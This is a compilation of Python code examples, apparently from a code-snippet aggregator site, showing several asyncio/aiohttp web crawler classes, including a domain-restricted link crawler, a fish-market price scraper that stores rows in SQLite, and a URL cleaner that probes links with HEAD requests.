#                if self.strict:
#                    self.root_domains.add(host)
#                else:
#                    self.root_domains.add(lenient_host(host))
#        for root in roots:
#            print("true root")
#            print(root)
#            self.add_url(root)
        self.add_url(roots)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.connector.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()
        #Mick - raw HTML page
                #print(text)
                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']?([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)

                for url in urls:

                    #if(url.find("/ibm/console/logon.jsp?action=OK"):
                     #   print("There is a login page")

                    normalized = urllib.parse.urljoin(response.url, url)

#                    path = get_domain(str(normalized))

                    with open(path, 'a') as temp_file:
                        temp_file.write(str(normalized) + ',\n')
                        temp_file.close()

                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from aiohttp.request(
                    'get', url,
                    connector=self.connector,
                    allow_redirects=False,
                    loop=self.loop)
                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)
                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        if is_redirect(response):
            location = response.headers['location']
            next_url = urllib.parse.urljoin(url, location)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=next_url,
                                                 status=response.status,
                                                 exception=None,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))

            if next_url in self.seen_urls:
                return
            if max_redirect > 0:
                LOGGER.info('redirect to %r from %r', next_url, url)
                self.add_url(next_url, max_redirect - 1)
            else:
                LOGGER.error('redirect limit reached for %r from %r',
                             next_url, url)
        else:
            stat, links = yield from self.parse_links(response)
            self.record_statistic(stat)
            for link in links.difference(self.seen_urls):
                self.q.put_nowait((link, self.max_redirect))
            self.seen_urls.update(links)


    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        while True:
            url, max_redirect = yield from self.q.get()
            assert url in self.seen_urls
            yield from self.fetch(url, max_redirect)
            self.q.task_done()

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)

        #TODO Mick - getting a new URL
        #print("new url: ")
        #print(url)

#        path = get_domain(url)

#        with open(path, 'w') as temp_file:
#            print('writing')
#            temp_file.write('Domain name:')
#            temp_file.write(url)
#            temp_file.write('\n \n')
#            temp_file.close()


        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        print("crawling...")
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        assert self.seen_urls == set(stat.url for stat in self.done)
        self.t1 = time.time()
        for w in workers:
            w.cancel()
예제 #14
0
class Crawler:
    """Crawl the aquatic market data of a specific date interval.
    """
    def __init__(self,
                 start_date,
                 end_date,
                 max_tasks=10,
                 max_tries=10,
                 loop=None):
        self.start_date = start_date
        self.end_date = end_date
        self.max_tasks = max_tasks
        self.max_tries = max_tries

        self.loop = loop or asyncio.get_event_loop()
        self.session = aiohttp.ClientSession(loop=self.loop)

        self.q = Queue(loop=self.loop)

        self.t0 = time.time()
        self.t1 = None

        self.make_url_queue()

    def add_url(self, url):
        self.q.put_nowait(url)

    def make_url_queue(self):
        dates = dates_gen_fn(self.start_date, self.end_date)
        for date in dates:
            roc_year = int(date.strftime('%Y')) - 1911
            query_date = '{:3d}{}'.format(roc_year,
                                          date.strftime('%m%d')).replace(
                                              ' ', '0')
            url = BASE_URL.format(query_date, query_date)
            self.add_url(url)

    def close(self):
        self.session.close()

    @asyncio.coroutine
    def parse(self, response):
        # print(response)
        if response.status == 200:
            content_type = response.headers.get('content-type')

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            if content_type in ('text/html', 'application/xml'):
                json = yield from response.json(content_type=content_type)
                if json:
                    # print(len(json))
                    for item in json:
                        # print(item)
                        type_name = item['魚貨名稱']
                        type_code = item['品種代碼']
                        market_name = item['市場名稱']
                        high_price = item['上價']
                        low_price = item['下價']
                        mid_price = item['中價']
                        avg_price = item['平均價']
                        date = item['交易日期']
                        trans_amount = item['交易量']

                        sql = '''
                        INSERT INTO {}
                        (type_name, type_code, market_name, high_price, low_price, mid_price, avg_price, date, trans_amount)
                        VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)'''.format(
                            DATABASE_TABLE)
                        cur.execute(sql, (type_name, type_code, market_name,
                                          high_price, low_price, mid_price,
                                          avg_price, date, trans_amount))

                    conn.commit()

        return

    @asyncio.coroutine
    def fetch(self, url):
        """Fetch one URL."""
        tries = 0
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url,
                                                       allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                # exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            return

        try:
            yield from self.parse(response)

        finally:
            yield from response.release()

        print('{} done'.format(url))

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url = yield from self.q.get()
                yield from self.fetch(url)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

        conn.close()

        dt = self.t1 - self.t0
        print('elapsed time: {}'.format(dt))
예제 #15
0
class URLCleaner:
    """Preprocess and clean urls."""
    def __init__(self, urls, normalizer, result_saver=print,
                 qsize=None, result_qsize=None, num_workers=1,
                 max_tries=4, timeout=3, max_connections=30, *, loop=None):
        """Async URLCleaner.

        :param normalizer: callable that takes url and returns normalized url
        or False when url is invalid or None, when url can't be validated.

        """
        self.urls = urls
        self.normalizer = normalizer
        self.result_saver = result_saver

        self.loop = loop or asyncio.get_event_loop()
        self.q = Queue(maxsize=qsize or num_workers * 10, loop=self.loop)
        self.result_q = Queue(maxsize=result_qsize or num_workers * 10,
                              loop=self.loop)

        self.num_workers = num_workers
        self.max_tries = max_tries
        self.timeout = timeout
        proxy = os.environ.get('http_proxy')
        if proxy:
            self.connector = aiohttp.ProxyConnector(proxy=proxy,
                                                    limit=max_connections,
                                                    loop=self.loop)
        else:
            self.connector = aiohttp.TCPConnector(limit=max_connections,
                                                  loop=self.loop)

        self.t0 = time.time()
        self.t1 = None
        self.clean_task = None

    def local_clean(self, url):
        local_clean_url = self.normalizer(url)
        if local_clean_url:
            status = 'LOCAL_OK'
        elif local_clean_url is False:
            status = 'LOCAL_INVALID'
            local_clean_url = None
        else:
            status = 'UNCLEANED'
        return URLStat(url=url, local_clean_url=local_clean_url,
                       remote_clean_url=None, status=status, http_code=None,
                       exception=None)

    @asyncio.coroutine
    def remote_clean(self, urlstat):
        """Check URL by HEAD probing it."""
        tries = 0
        exception = None
        url = urlstat.local_clean_url
        headers = {
            'Accept-Encoding': 'identity',
        }
        while tries < self.max_tries:
            try:
                response = yield from asyncio.wait_for(
                    aiohttp.request('head', url, allow_redirects=True,
                                    headers=headers,
                                    connector=self.connector, loop=self.loop),
                    self.timeout, loop=self.loop)
                response.close()

                if tries > 1:
                    logger.info('Try %r for %r success', tries, url)
                break

            except ValueError as error:
                # do not need to retry for these errors
                logger.info('For %r raised %s', url, error)
                tries = self.max_tries
                exception = error

            except aiohttp.HttpProcessingError as e:
                logger.error('Got http error for %r, exception %s', url, e)
                urlstat.http_code = e.code
                urlstat.status = 'REMOTE_ERROR'
                urlstat.exception = e
                return urlstat

            except (aiohttp.ClientError, asyncio.TimeoutError) as error:
                logger.info('Try %r for %r raised %s, %s', tries, url,
                            type(error), error)
                exception = error

            tries += 1
            yield from asyncio.sleep(0.1)
        else:
            # all tries failed
            logger.error('all tries for %r failed, exception %s', url,
                         exception)
            urlstat.status = 'REMOTE_ERROR'
            urlstat.exception = exception
            return urlstat

        urlstat.http_code = response.status

        if response.status == 200:
            remote_clean_url = self.normalizer(response.url)
            if remote_clean_url:
                urlstat.status = 'REMOTE_OK'
                urlstat.remote_clean_url = remote_clean_url
            elif remote_clean_url is False:
                urlstat.status = 'REMOTE_INVALID'
            else:
                # url requires authorization, can't clean
                urlstat.status = 'UNCLEANED'
        else:
            urlstat.status = 'REMOTE_INVALID'

        return urlstat

    @asyncio.coroutine
    def process_url(self, url):
        urlstat = self.local_clean(url)
        if urlstat.status == 'LOCAL_OK':
            urlstat = yield from self.remote_clean(urlstat)
        return urlstat

    def close(self):
        """Close resources."""
        self.connector.close()

    @asyncio.coroutine
    def save_results(self):
        """Save cleaned URLStat."""
        while True:
            urlstat = yield from self.result_q.get()
            try:
                self.result_saver(urlstat)
            except StopIteration:
                self.cancel()

            except Exception as e: # noqa
                logger.exception(e)

            self.result_q.task_done()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        while True:
            url = yield from self.q.get()
            urlstat = yield from self.process_url(url)
            self.q.task_done()
            yield from self.result_q.put(urlstat)

    @asyncio.coroutine
    def _clean(self):
        try:
            self.consumer = asyncio.Task(self.save_results(), loop=self.loop)
            self.workers = [asyncio.Task(self.work(), loop=self.loop) for _ in
                            range(self.num_workers)]
            self.t0 = time.time()

            for url in self.urls:
                yield from self.q.put(url)

            yield from self.q.join()
            yield from self.result_q.join()

            self.t1 = time.time()
            logger.debug('Cleaning time %.2f seconds', self.t1 - self.t0)
            self.cancel()

        finally:
            self.close()

    def clean(self):
        """Run the cleaner until all finished."""
        self.clean_task = asyncio.async(self._clean(), loop=self.loop)
        return self.clean_task

    def cancel(self):
        self.consumer.cancel()
        for w in self.workers:
            w.cancel()

        self.clean_task.cancel()
예제 #16
0
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(
            self,
            roots,
            exclude=None,
            strict=True,  # What to crawl.
            max_redirect=10,
            max_tries=4,  # Per-url limits.
            max_tasks=10,
            *,
            loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)  # url执行队列,使用put将url放入队列供爬虫爬取
        self.seen_urls = set()
        self.done = []  # 完成列表,每个元素是访问url后的具名元组FetchStatistic
        self.session = aiohttp.ClientSession(loop=self.loop)  # 单线程IO操作
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(
                root)  # return 6 parts includes netloc(host+port)
            host, port = urllib.parse.splitport(
                parts.netloc)  # www.baidu.com, 80
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):  # 如果url是全数字
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:  # 省略www.
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)  # add url to seen_urls set
        self.t0 = time.time()  # bgn time
        self.t1 = None  # end time

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)  # 带www.
        else:
            return self._host_okay_lenient(host)  # 不带www.

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):  # 这def里的内容好像和现在主流的网页代码不太match,需要使用,需修改
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()  # 返回网页代码的<body>内容

        if response.status == 200:
            content_type = response.headers.get(
                'content-type')  # 只分析头部有content-type的
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))  # 在href中找urls
                if urls:
                    LOGGER.info('got %r distinct urls from %r', len(urls),
                                response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(url=response.url,
                              next_url=None,
                              status=response.status,
                              exception=None,
                              size=len(body),
                              content_type=content_type,
                              encoding=encoding,
                              num_urls=len(links),
                              num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url,
                                                       allow_redirects=False)
                # session是个单线程IO操作,访问url,返回response。结合@asyncio.coroutine达成多线程异步IO操作

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries', url, self.max_tries)
            self.record_statistic(
                FetchStatistic(url=url,
                               next_url=None,
                               status=None,
                               exception=exception,
                               size=0,
                               content_type=None,
                               encoding=None,
                               num_urls=0,
                               num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url,
                                                location)  # 是跳转下级连接,需要拼接出完整连接
                self.record_statistic(
                    FetchStatistic(url=url,
                                   next_url=next_url,
                                   status=response.status,
                                   exception=None,
                                   size=0,
                                   content_type=None,
                                   encoding=None,
                                   num_urls=0,
                                   num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:  # 不是跳转下级,是完整link,则需要分析link,即下一环的协程工作
                stat, links = yield from self.parse_links(
                    response)  # 提取并分析link
                self.record_statistic(stat)
                for link in links.difference(
                        self.seen_urls):  # 在links里,但不在seen_urls里
                    self.q.put_nowait((link, self.max_redirect))  # 放入执行队列
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls  # 如果url不在seen_urls里,则跳进except
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):  # 过滤非法url
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(
                host):  # 过滤那些root url不在roots列表里的,roots列表见crawl.py
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine  # 异步协程:爬取执行到yield from时并不会停止等待,而是立刻执行loop中的下一个爬取crawl函数
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]  # 创建100个workers的list,其中每个work就是一个task(thread)
        self.t0 = time.time()
        yield from self.q.join()  # 等待所有线程worker完成工作
        # yield from 解释见: https://www.cnblogs.com/wongbingming/p/9085268.html
        # 每个耗时的动作都编写一个@asyncio.coroutine下的def,然后在这个def内用yield from连接另外一个耗时的同candy的def
        self.t1 = time.time()
        for w in workers:
            w.cancel()  # cancel this task
예제 #17
0
파일: crawling.py 프로젝트: zzkhaz/aspider
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """

    def __init__(self, roots,
                 # What to crawl.
                 exclude=None, include=None, output=None, strict=True, count=None,
                 proxy=None, max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, loop=None, no_parse_links=False):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.include = include
        self.output = output
        self.count = int(count) if count else None
        self.strict = strict
        self.proxy = proxy
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.task_exit_counter = 0
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        self.no_parse_links = no_parse_links
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None
        self.output_file = self.get_file()

    @asyncio.coroutine
    def close(self):
        """Close resources."""
        yield from self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    def parse_text(self, url, text):
        '''
        call callback func on route
        '''
        route, args = router.match(url)
        if route:
            route.call(text, **args)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text(errors='ignore')

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    logger.debug('got %r distinct urls from %r',
                                 len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(str(response.url), url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

                # parse text
                self.parse_text(str(response.url), text)

                # do outing
                self.handle_output(str(response.url), text)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    def handle_output(self, url, text):
        if self.output:
            d = self.parse_output(url, text)
            logger.info(f'write item: {url}')
            outputing.do_write(self.output, d, self.output_file)

    def parse_output(self, url, text):
        html = HTML(html=text)
        title_ele = html.find('title', first=True)
        d = OrderedDict()
        d['title'] = title_ele.text
        d['url'] = url
        d['datetime'] = now_time()
        d['text'] = text
        return d

    def get_file(self):
        '''
        generate a file name for output
        '''
        domains = list(self.root_domains)
        dt = datetime.datetime.now()
        dt_str = dt.strftime('%Y-%m-%d %H:%M:%S')
        f_name = f'{domains[0]}-{dt_str}'
        if self.output:
            if self.output == 'stream':
                return None
            f_name += f'.{self.output}'
        return f_name

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False, proxy=self.proxy)

                if tries > 1:
                    logger.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                logger.info('try %r for %r raised %r',
                            tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            logger.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    logger.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    logger.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                # disable parse links
                if not self.no_parse_links:
                    for link in links.difference(self.seen_urls):
                        # use router to verify links
                        if self.verify_url(link) or router.verify_url(link, url):
                            self.q.put_nowait((link, self.max_redirect))
                    self.seen_urls.update(links)
        except Exception as ex:
            logger.error(f'parse error: {url}')
            logger.exception(ex)
        finally:
            yield from asyncio.sleep(1)
            yield from response.release()

    @asyncio.coroutine
    def exit_on_empty_queue(self):
        if self.count and len(self.done) >= self.count:
            logger.warning(f'reach count: {self.count}, now quit')
            router.stop()

        if self.q.qsize() == 0:
            logger.warning('empty queue, now quit')
            yield from self.q.join()
            router.stop()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while router.is_running():
                url, max_redirect = yield from self.q.get()
                logger.debug(f'work on url {url}')
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
                yield from self.exit_on_empty_queue()

        except asyncio.CancelledError:
            logger.warning('canceling the worker')

    def url_allowed(self, url):
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            # logger.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            # logger.debug('skipping non-root host in %r', url)
            return False
        return True

    def verify_url(self, url):
        if self.include:
            for pattern in self.include:
                if re.search(pattern, url):
                    logger.debug(
                        f'{url} match include pattern: {pattern}, allowed')
                    return True
        if self.exclude and re.search(self.exclude, url):
            logger.debug(
                f'{url} match exclude pattern: {self.exclude}, rejected')
            return False
        # default False
        return False

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        logger.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        try:
            workers = [asyncio.Task(self.work(), loop=self.loop)
                       for _ in range(self.max_tasks)]
            self.t0 = time.time()
            # yield from asyncio.gather(*workers, loop=self.loop, return_exceptions=True)
            yield from router.quit_event.wait()
            for w in workers:
                w.cancel()
            self.t1 = time.time()
        except asyncio.CancelledError:
            logger.warning('canceling the crawler')
        finally:
            logger.warning('closing the crawler')
            yield from self.close()
예제 #18
0
class Crawler:
    def __init__(self, root_url: str, max_redirect: int):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        # aiohttp 的 ClientSession 执行连接池 并且 HTTP 为我们 keep-alive
        self.session = aiohttp.ClientSession(loop=loop)

        # 把 (URL, max_redirect) 放入队列
        self.q.put((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """运行 crawler 直到所有的工作完成"""
        wokers = [asyncio.Task(self.work())
                  for _ in range(self.max_tasks)]

        # 当所有任务完成,退出
        yield from self.q.join()
        for w in wokers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()

            # 下载页面并向 self.q 中增加新链接
            yield from self.fetch(url, max_redirect)
            self.q.task_done()

    @asyncio.coroutine
    def fetch(self, url: str, max_redirect: int):
        # 我们自己处理 redirects
        response = yield from self.session.get(
            url, allow_redirects=False
        )

        try:
            if is_redirect(response):
                if max_redirect > 0:
                    next_url = response.headers['location']
                    if next_url in self.seen_urls:
                        # 我们已经下载过这个路径
                        return

                # 记录我们已经看过这条连接
                self.seen_urls.add(next_url)

                # 跟进重定向,重定向次数减一
                self.q.put_nowait((next_url, max_redirect - 1))
            else:
                links = yield from self.parse_links(response)
                # python集合逻辑
                for link in links.dirrerence(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            # 返回连接池
            yield from response.release()
예제 #19
0
class Spider:
    def __init__(self,
                 max_tries=30,
                 max_tasks=10,
                 timeout=5,
                 rootDir=os.getcwd()):
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.loop = asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.timeout = timeout
        self.rootDir = rootDir

    def close(self):
        self.session.close()

    def append_request(self, request):
        self.q.put_nowait(request)

    @asyncio.coroutine
    def _get_request(self):
        r = yield from self.q.get()
        return r

    @asyncio.coroutine
    def fetch(self, request_type, url, params, data):
        """Fetch one URL"""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                print("try %s---->%d times" % (url, tries))
                with aiohttp.Timeout(self.timeout):
                    response = yield from self.session.get(url, params=params)
                    if response.status == 200:
                        content_type = response.headers.get('content-type')
                        if content_type in CONTENT_TYPE_TEXT:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.text(
                                    encoding='GBK')
                        else:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.read()
                    break
            except asyncio.TimeoutError:
                print("timeout")
            except aiohttp.ClientError as client_error:
                print("client error")
            except Exception:
                print("unknown error")
            tries += 1
        else:
            print("try %s---->more than %d times, quit" % (url, tries))
            return None

        response.release()
        return content

    @asyncio.coroutine
    def _work(self):
        """Process queue items forever."""
        try:
            while True:
                r = yield from self._get_request()
                content = yield from self.fetch(r.request_type, r.url,
                                                r.params, r.data)
                if (content):
                    r.handle_func(content)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def work(self):
        yield from self._work()

